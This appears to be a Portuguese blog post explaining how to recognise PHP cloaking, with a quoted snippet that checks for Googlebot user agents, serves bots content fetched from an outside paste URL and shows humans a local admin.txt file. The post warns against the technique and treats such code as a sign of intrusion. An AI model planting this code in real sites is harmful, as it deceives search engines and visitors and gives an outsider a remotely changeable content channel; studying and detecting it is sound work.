Cloaking em PHP: Como Identificar e Por Que Evitar essa Prática de Risco

Por /

Este código PHP demonstra uma técnica conhecida como cloaking, onde o conteúdo exibido varia de acordo com quem está acessando o site. Embora pareça inofensivo, essa prática é frequentemente associada a SEO black hat e distribuição de conteúdo malicioso.

O Problema

O cloaking consiste em mostrar um conteúdo para robôs (como o Google) e outro completamente diferente para usuários reais. Isso pode ser usado para manipular resultados de busca ou esconder scripts maliciosos.

No código analisado, há uma verificação do User-Agent para identificar se o visitante é um bot do Google. Dependendo disso, o sistema retorna conteúdos diferentes:

  • Para bots: carrega conteúdo remoto de uma URL externa
  • Para usuários: carrega um arquivo local chamado admin.txt

A Solução

Vamos analisar o código para entender exatamente como essa técnica funciona e por que ela é perigosa:

function is_google_bot() {
    $agents = array("Googlebot", "Google-Site-Verification", "Google-InspectionTool", "Googlebot-Mobile", "Googlebot-News");
    foreach ($agents as $agent) {
        if (strpos($_SERVER['HTTP_USER_AGENT'], $agent) !== false) return true;
    }
    return false;
}
 
if (is_google_bot()) {
    $bot_content = file_get_contents('https://paste.haxor-research.com/raw/78e6c97e');
    echo $bot_content;
    exit;
} else {
    include('admin.txt');
    exit;
}

O que esse código faz na prática?

  • Detecta bots: A função is_google_bot() verifica se o User-Agent contém identificadores do Google.
  • Conteúdo remoto: Se for bot, faz um file_get_contents() para buscar conteúdo externo.
  • Conteúdo oculto: Usuários comuns recebem outro conteúdo via include().

Por que isso é perigoso?

  • SEO Black Hat: Pode resultar em penalizações do Google.
  • Segurança: Conteúdo remoto pode ser alterado a qualquer momento (backdoor).
  • Injeção de malware: Sites comprometidos frequentemente usam essa técnica.
  • Difícil detecção: Admins podem não perceber, pois veem conteúdo diferente do bot.

Conclusão

Esse tipo de implementação é um exemplo clássico de cloaking e deve ser evitado em qualquer cenário legítimo. Além de violar diretrizes de SEO, representa um sério risco de segurança, especialmente por carregar conteúdo remoto dinâmico.

Se você encontrar algo semelhante em um projeto, investigue imediatamente — pode ser um indicativo de invasão ou código malicioso inserido sem conhecimento da equipe.

Deixe um comentário

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *

Rolar para cima